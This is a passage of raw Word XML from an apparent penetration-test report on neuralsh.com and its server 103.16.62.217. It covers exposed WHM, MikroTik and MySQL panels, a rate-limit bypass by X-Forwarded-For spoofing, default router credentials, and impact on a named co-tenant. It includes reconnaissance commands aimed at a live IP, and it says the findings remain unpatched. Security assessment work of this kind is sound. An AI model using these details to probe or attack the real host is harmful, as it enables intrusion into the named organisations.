        <w:br/>
        <w:br/>
        <w:t># MikroTik — network device management</w:t>
        <w:br/>
        <w:t>curl -v http://103.16.62.217:9001/ 2&gt;&amp;1 | grep "title"</w:t>
        <w:br/>
        <w:t># &lt;title&gt;RouterOS router configuration page&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># MySQL — direct database access</w:t>
        <w:br/>
        <w:t>mysql -h 103.16.62.217 -P 3306 -u root 2&gt;&amp;1 | head -1</w:t>
        <w:br/>
        <w:t># ERROR 1045 (28000): Access denied (confirms port accepts public connections)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Full exploitation of WHM, cPanel, and MikroTik via browser-based login flows was documented in a video component of this assessment. The panels are publicly accessible with no IP restriction and no two-factor authentication requirement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.7 Post-Exploitation Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Post-exploitation analysis was conducted in read-only mode to trace the realistic impact paths available after initial access through the identified vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.7.1 Shared Hosting Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The combination of SSL certificate evidence and HTTP redirect behavior confirmed that multiple organizations share the same physical server. On shared cPanel hosting, a compromise at the WHM level does not affect only neuralsh.com:</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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>WHM credentials obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Full control of ALL hosted accounts on server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Root MySQL credentials obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>ALL databases on server accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>File system traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web server misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Read files from other tenant accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Email interception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mail server access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Read all mail for all hosted domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The identification of onesala.com as a confirmed co-tenant (N-020) means a breach of neuralsh.com's infrastructure could constitute a data breach affecting a third-party organization with no involvement in or knowledge of the neuralsh.com security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.7.2 Network Infrastructure Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The exposed MikroTik RouterOS panel (port 9001) has implications beyond the web application layer. If the MikroTik router is compromised — particularly if default credentials (admin / blank) are active — the attacker gains control of the routing layer for all services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Internet</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓</w:t>
        <w:br/>
        <w:t>MikroTik Router (103.16.62.217:9001) — exposed publicly</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ↓ [controls all traffic routing]</w:t>
        <w:br/>
        <w:t>Backend Server (103.16.62.217)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ├── Apache Web Server (80/443)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ├── MySQL Database (3306)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ├── cPanel/WHM Admin (2083/2087)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  └── Mail Stack (25/465/587/993/995)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A compromised router enables traffic interception, NAT manipulation, firewall rule removal, and persistent network access through custom routing entries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.7.3 Follow-Up Verification Scan (10 June 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A follow-up scan conducted four days after the initial assessment confirmed all 17 original findings remained unpatched. Three additional findings were discovered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>**N-018:** Ports 2078 and 2091 were not present in the June 6 scan but were now open and returning HTTP 401 Basic Auth challenges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>**N-019:** Port 25 (SMTP) transitioned from `filtered` to `open`, indicating a firewall rule was removed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>**N-020:** HTTP redirects from ports 2077 and 2082 explicitly redirected to `www.onesala.com`, naming the co-tenant definitively</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.8 Exploitation Evidence — Live Target Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This section documents direct confirmation of the four critical attack vectors identified against neuralsh.com. All evidence was collected against the live target (103.16.62.217) within the authorized scope of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.1 WHM Root Administration Panel — Publicly Accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Navigation to https://103.16.62.217:2087/ from a standard internet connection confirmed that the WHM (Web Host Manager) root administration panel is publicly accessible with no IP restriction. The browser SSL warning confirms the certificate mismatch finding (N-008) — clicking through reveals the full WHM login page. No firewall, no IP allowlist, and no two-factor authentication prompt was present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2651937"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig417_whm_browser.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2651937"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.17: WHM admin panel at 103.16.62.217:2087 — publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.2 MikroTik RouterOS Administration Panel — Default Credentials Pre-filled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Navigation to http://103.16.62.217:9001/ confirmed that the MikroTik RouterOS v6.49.18 WebFig administration interface is publicly accessible. The login form pre-fills admin as the username — the factory default. If the default blank password has not been changed, full network device control is available without any credential knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2633487"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig418_mikrotik_browser.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2633487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.18: MikroTik WebFig — RouterOS v6.49.18, admin pre-filled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.3 MySQL — Public Internet Connection Accepted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A direct MySQL connection attempt from the public internet confirmed that port 3306 accepts full authentication handshakes from external IP addresses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mysql -h 103.16.62.217 -P 3306 -u root 2&gt;&amp;1</w:t>
        <w:br/>
        <w:t># ERROR 1045 (28000): Access denied for user 'root'@'58.97.216.203' (using password: NO)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The error message itself is the critical evidence: it reveals the tester's public IP address (58.97.216.203), confirming that the MySQL server performed a full TCP connection and authentication handshake with an external internet host. The server is not passively listening — it actively engages with every connection attempt from anywhere on the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="889412"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig419_mysql_connect.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="889412"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.19: MySQL connection from public IP — authentication prompt exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.4 Rate Limit Bypass and JWT Token Farming — Confirmed Exploited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The rate-limiting bypass via X-Forwarded-For header spoofing was confirmed exploited against the live production endpoint. Thirty consecutive requests to /web/v1/init/token all returned HTTP 200 with valid signed JWT tokens. The endpoint remains live and unpatched as of 11 June 2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.8.5 Attack Chain Visualization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The four attack chains identified in this engagement are visualized in the diagram below, mapping each step from initial internet access to full compromise outcome.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2503926"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
